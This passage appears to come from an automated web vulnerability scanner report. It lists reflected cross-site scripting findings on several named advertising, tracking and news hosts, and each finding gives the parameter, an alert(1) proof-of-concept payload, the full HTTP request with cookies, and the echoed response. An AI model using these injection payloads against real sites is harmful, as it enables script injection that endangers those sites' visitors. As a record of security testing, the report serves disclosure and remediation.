Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c1/jsc/fmr.js?c=234&a=0&f=&n=187&r=13&d=94&q=&$=ee14d"%3balert(1)//df0d75c743f&s=0&z=0.1743083985056728 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.zedo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFgeo=5386156; ZEDOIDA=Gk1EThcyantUIc4uiIsUXCzG~081111; ZEDOIDX=29; FFAbh=957B740,20|1_1#365; FFBbh=957B740,20|1_1#0; ZFFAbh=957B826,20|2_1#365; ZFFBbh=957B826,20|2_1#0; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=187:ee14d";alert(1)//df0d75c743f;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=187,234,94;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "91707f6e-8747-4aa4e3834d480"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=120
Expires: Mon, 15 Aug 2011 18:57:44 GMT
Date: Mon, 15 Aug 2011 18:55:44 GMT
Content-Length: 954
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat=',ee14d";alert(1)//df0d75c743f';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,ee14d";alert(1)//df0d75c743f;z="+Math.random();}

if(zzuid=='unknown')zzuid='Gk1EThcyantUIc4uiIsUXCzG~081111';

var zzhasAd=undefined;
var zzpixie = new Image();
var zzRandom = Math.random();
var zzDate = new Date();
var zzd = ne
...[SNIP]...

1.35. http://c7.zedo.com/bar/v16-504/c1/jsc/fmr.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c1/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 417bf'%3balert(1)//f75064a5c68 was submitted in the $ parameter. This input was echoed as 417bf';alert(1)//f75064a5c68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c1/jsc/fmr.js?c=234&a=0&f=&n=187&r=13&d=94&q=&$=417bf'%3balert(1)//f75064a5c68&s=0&z=0.1743083985056728 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.zedo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFgeo=5386156; ZEDOIDA=Gk1EThcyantUIc4uiIsUXCzG~081111; ZEDOIDX=29; FFAbh=957B740,20|1_1#365; FFBbh=957B740,20|1_1#0; ZFFAbh=957B826,20|2_1#365; ZFFBbh=957B826,20|2_1#0; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=187:417bf';alert(1)//f75064a5c68;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=187,234,94;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "91707f6e-8747-4aa4e3834d480"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=120
Expires: Mon, 15 Aug 2011 18:57:44 GMT
Date: Mon, 15 Aug 2011 18:55:44 GMT
Content-Length: 954
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat=',417bf';alert(1)//f75064a5c68';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,417bf';alert(1)//f75064a5c68;z="+Math.random();}

if(zzuid=='unknown')zzuid='Gk1EThcyantUIc4uiIsUXCzG~081111';

var zzhasA
...[SNIP]...

1.36. http://c7.zedo.com/bar/v16-504/c1/jsc/fmr.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c1/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76d52"%3balert(1)//b5654298ad1 was submitted in the q parameter. This input was echoed as 76d52";alert(1)//b5654298ad1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c1/jsc/fmr.js?c=234&a=0&f=&n=187&r=13&d=94&q=76d52"%3balert(1)//b5654298ad1&$=&s=0&z=0.1743083985056728 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.zedo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFgeo=5386156; ZEDOIDA=Gk1EThcyantUIc4uiIsUXCzG~081111; ZEDOIDX=29; FFAbh=957B740,20|1_1#365; FFBbh=957B740,20|1_1#0; ZFFAbh=957B826,20|2_1#365; ZFFBbh=957B826,20|2_1#0; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=1;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=187,234,94;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "91707f6e-8747-4aa4e3834d480"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=120
Expires: Mon, 15 Aug 2011 18:57:44 GMT
Date: Mon, 15 Aug 2011 18:55:44 GMT
Content-Length: 951
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='76d52";alert(1)//b5654298ad1';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=76d52";alert(1)//b5654298ad1;z="+Math.random();}

if(zzuid=='unknown')zzuid='Gk1EThcyantUIc4uiIsUXCzG~081111';

var zzhasAd=undefined;
var zzpixie = new Image();
var zzRandom = Math.random();
var zzDate = new Date();
var zzd = ne
...[SNIP]...

1.37. http://c7.zedo.com/bar/v16-504/c1/jsc/fmr.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c1/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe1bd'%3balert(1)//2f29b929aac was submitted in the q parameter. This input was echoed as fe1bd';alert(1)//2f29b929aac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c1/jsc/fmr.js?c=234&a=0&f=&n=187&r=13&d=94&q=fe1bd'%3balert(1)//2f29b929aac&$=&s=0&z=0.1743083985056728 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.zedo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFgeo=5386156; ZEDOIDA=Gk1EThcyantUIc4uiIsUXCzG~081111; ZEDOIDX=29; FFAbh=957B740,20|1_1#365; FFBbh=957B740,20|1_1#0; ZFFAbh=957B826,20|2_1#365; ZFFBbh=957B826,20|2_1#0; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=1;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=187,234,94;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "91707f6e-8747-4aa4e3834d480"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=120
Expires: Mon, 15 Aug 2011 18:57:44 GMT
Date: Mon, 15 Aug 2011 18:55:44 GMT
Content-Length: 951
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='fe1bd';alert(1)//2f29b929aac';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=fe1bd';alert(1)//2f29b929aac;z="+Math.random();}

if(zzuid=='unknown')zzuid='Gk1EThcyantUIc4uiIsUXCzG~081111';

var zzhasAd
...[SNIP]...

1.38. http://choices.truste.com/ca [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 49938<script>alert(1)</script>4702d2d7a79 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0511wl300x250&c=att02cont1049938<script>alert(1)</script>4702d2d7a79&w=300&h=250&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286369565/direct;wi.300;hi.250/01?click=http://clk.specificclick.net/click/v=5;m=3;l=12915;c=171139;b=1014305;ts=20110815142410;dct=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Mon, 15 Aug 2011 18:24:51 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Content-Length: 37870
Connection: keep-alive

if (typeof truste == "undefined" || !truste) {

   // initializing logger
   window.log = function() {
       log.history = log.history || [];
       log.history.push(arguments);
       if (this.console) {
           console.lo
...[SNIP]...
cbe7-itl',
                           'iconSpanId':'te-clr1-d01e0059-a348-4046-bc2e-970a3218cbe7-icon',
                           'backgroundColor':'white',
                           'opacity':.8,
                           'filterOpacity':80.0,
                           'containerId':'att02cont1049938<script>alert(1)</script>4702d2d7a79',
                           'noticeBaseUrl':'http://choices-elb.truste.com/camsg?',
                           'irBaseUrl': 'http://choices-elb.truste.com/cair?',
                           'interstitial':te_clr1_d01e0059_a348_4046_bc2e_970a3218cbe7_ib,
                   
...[SNIP]...

1.39. http://choices.truste.com/ca [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload 5b44b<script>alert(1)</script>fc4461e59db was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0511wl300x2505b44b<script>alert(1)</script>fc4461e59db&c=att02cont10&w=300&h=250&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286369565/direct;wi.300;hi.250/01?click=http://clk.specificclick.net/click/v=5;m=3;l=12915;c=171139;b=1014305;ts=20110815142410;dct=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Mon, 15 Aug 2011 18:24:48 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Content-Length: 37911
Connection: keep-alive

if (typeof truste == "undefined" || !truste) {

   // initializing logger
   window.log = function() {
       log.history = log.history || [];
       log.history.push(arguments);
       if (this.console) {
           console.lo
...[SNIP]...
<a href="http://preferences.truste.com/preference.html?affiliateId=16&pid=mec01&aid=att02&cid=0511wl300x2505b44b<script>alert(1)</script>fc4461e59db" target="_blank">
...[SNIP]...

1.40. http://choices.truste.com/ca [iplc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the iplc request parameter is copied into the HTML document as plain text between tags. The payload 7a4c1<script>alert(1)</script>805cb70c449 was submitted in the iplc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0511wl300x250&c=att02cont10&w=300&h=250&zi=10002&plc=tr&iplc=ctr7a4c1<script>alert(1)</script>805cb70c449 HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286369565/direct;wi.300;hi.250/01?click=http://clk.specificclick.net/click/v=5;m=3;l=12915;c=171139;b=1014305;ts=20110815142410;dct=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Mon, 15 Aug 2011 18:24:56 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Content-Length: 37870
Connection: keep-alive

if (typeof truste == "undefined" || !truste) {

   // initializing logger
   window.log = function() {
       log.history = log.history || [];
       log.history.push(arguments);
       if (this.console) {
           console.lo
...[SNIP]...
5-a7e0-55208c6ffa8b',
                           'anchName':'te-clr1-ac5b5fdb-6931-4cf5-a7e0-55208c6ffa8b-anch',
                           'width':300,
                           'height':250,
                           'ox':0,
                           'oy':0,
                           'plc':'tr',
                           'iplc':'ctr7a4c1<script>alert(1)</script>805cb70c449',
                           'intDivName':'te-clr1-ac5b5fdb-6931-4cf5-a7e0-55208c6ffa8b-itl',
                           'iconSpanId':'te-clr1-ac5b5fdb-6931-4cf5-a7e0-55208c6ffa8b-icon',
                           'backgroundColor':'white',
                           'opacity':.8
...[SNIP]...

1.41. http://choices.truste.com/ca [plc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the plc request parameter is copied into the HTML document as plain text between tags. The payload d8568<script>alert(1)</script>f345ba26024 was submitted in the plc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0511wl300x250&c=att02cont10&w=300&h=250&zi=10002&plc=trd8568<script>alert(1)</script>f345ba26024&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286369565/direct;wi.300;hi.250/01?click=http://clk.specificclick.net/click/v=5;m=3;l=12915;c=171139;b=1014305;ts=20110815142410;dct=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Mon, 15 Aug 2011 18:24:54 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Content-Length: 37870
Connection: keep-alive

if (typeof truste == "undefined" || !truste) {

   // initializing logger
   window.log = function() {
       log.history = log.history || [];
       log.history.push(arguments);
       if (this.console) {
           console.lo
...[SNIP]...
lr1-bf5c4f87-0968-49d6-abf0-e67c4092fddc',
                           'anchName':'te-clr1-bf5c4f87-0968-49d6-abf0-e67c4092fddc-anch',
                           'width':300,
                           'height':250,
                           'ox':0,
                           'oy':0,
                           'plc':'trd8568<script>alert(1)</script>f345ba26024',
                           'iplc':'ctr',
                           'intDivName':'te-clr1-bf5c4f87-0968-49d6-abf0-e67c4092fddc-itl',
                           'iconSpanId':'te-clr1-bf5c4f87-0968-49d6-abf0-e67c4092fddc-icon',
                           'backgroundColor':'white'
...[SNIP]...

1.42. http://choices.truste.com/ca [zi parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the zi request parameter is copied into the HTML document as plain text between tags. The payload 15496<script>alert(1)</script>3213bac3295 was submitted in the zi parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0511wl300x250&c=att02cont10&w=300&h=250&zi=1000215496<script>alert(1)</script>3213bac3295&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286369565/direct;wi.300;hi.250/01?click=http://clk.specificclick.net/click/v=5;m=3;l=12915;c=171139;b=1014305;ts=20110815142410;dct=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Mon, 15 Aug 2011 18:24:53 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Connection: keep-alive
Content-Length: 37870

if (typeof truste == "undefined" || !truste) {

   // initializing logger
   window.log = function() {
       log.history = log.history || [];
       log.history.push(arguments);
       if (this.console) {
           console.lo
...[SNIP]...
truste.com/assets/ad_choices_i.png',
                           'icon_cam_mo': 'http://choices.truste.com/assets/ad_choices_en.png',
                           'iconText':'',
                           'aid':'att02',
                           'pid':'mec01',
                           'zindex':'1000215496<script>alert(1)</script>3213bac3295',
                           'cam':'2',
                           'cid':'0511wl300x250'
                       };

   truste.ca.bindingInitMap[te_clr1_74e886fc_d4d4_4cc9_9ab1_a7edb6906a41_bi.baseName] = 0;
   truste.ca.intInitMap[te_clr1_74e886fc_d4d4_4cc9_9ab
...[SNIP]...

1.43. http://count36.51yes.com/click.aspx [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://count36.51yes.com
Path:   /click.aspx

Issue detail

The value of the id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1744e'%3balert(1)//23fa84b4e34 was submitted in the id parameter. This input was echoed as 1744e';alert(1)//23fa84b4e34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /click.aspx?id=3602172621744e'%3balert(1)//23fa84b4e34&logo=12 HTTP/1.1
Host: count36.51yes.com
Proxy-Connection: keep-alive
Referer: http://lifeng.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:50:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=gb2312
Content-Length: 1750


function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
function y_g(name)
{var arg=name+"=";var
...[SNIP]...
<a href="http://countt.51yes.com/index.aspx?id=3602172621744e';alert(1)//23fa84b4e34" target=_blank title="51YES............">
...[SNIP]...

1.44. http://count36.51yes.com/click.aspx [logo parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://count36.51yes.com
Path:   /click.aspx

Issue detail

The value of the logo request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e549a'%3balert(1)//3d03e16b003 was submitted in the logo parameter. This input was echoed as e549a';alert(1)//3d03e16b003 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /click.aspx?id=360217262&logo=12e549a'%3balert(1)//3d03e16b003 HTTP/1.1
Host: count36.51yes.com
Proxy-Connection: keep-alive
Referer: http://lifeng.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:50:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=gb2312
Content-Length: 1806


function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
function y_g(name)
{var arg=name+"=";var
...[SNIP]...
<img width=20 height=20 border=0 hspace=0 vspace=0 src="http://count36.51yes.com/count12e549a';alert(1)//3d03e16b003.gif" alt="51YES............">
...[SNIP]...

1.45. http://js.revsci.net/gateway/gw.js [csid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload dd8f4<script>alert(1)</script>b2cc88b9f33 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=A09801dd8f4<script>alert(1)</script>b2cc88b9f33 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Aug 2011 18:44:57 GMT
Cache-Control: max-age=86400, private
Expires: Tue, 16 Aug 2011 18:44:57 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:44:57 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "A09801DD8F4<SCRIPT>ALERT(1)</SCRIPT>B2CC88B9F33" was not recognized.
*/

1.46. http://newspulse.cnn.com/widget/json/social [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newspulse.cnn.com
Path:   /widget/json/social

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 70c67<script>alert(1)</script>5505425b56e was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /widget/json/social?callback=jsonp131343402923870c67<script>alert(1)</script>5505425b56e&ids=768212f4d9c05b6c047059f0d80d78e0%2C768212f4d9c05b6c047059f0d80d78e0%2Cfa1930d5d87d06aeb18a1b0d2bc36ea2%2C762e86ff030cdfdcfd2dea6146211073%2C29a5dd7685c2606e3c83b6b52a2d6ab1%2Cae6fa2789fb64bc7ef840e25c8b4984d HTTP/1.1
Host: newspulse.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qca=P0-2040275928-1313434008975; __switchTo5x=38; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0; s_cc=true; s_sq=%5B%5BB%5D%5D; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __unam=7549672-131cec47d99-1e28128-2

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:48:06 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=300
Expires: Mon, 15 Aug 2011 18:53:06 GMT
Last-Modified: Mon, 15 Aug 2011 18:48:06 GMT
Content-Type: application/json;charset=UTF-8
Content-Length: 499

jsonp131343402923870c67<script>alert(1)</script>5505425b56e([{"hash":"768212f4d9c05b6c047059f0d80d78e0","facebook":68,"comments":45},{"hash":"768212f4d9c05b6c047059f0d80d78e0","facebook":68,"comments":45},{"hash":"fa1930d5d87d06aeb18a1b0d2bc36ea2","facebook":4
...[SNIP]...

1.47. http://showadsak.pubmatic.com/AdServer/AdServerServlet [frameName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The value of the frameName request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fa829'-alert(1)-'9126a56ebc was submitted in the frameName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

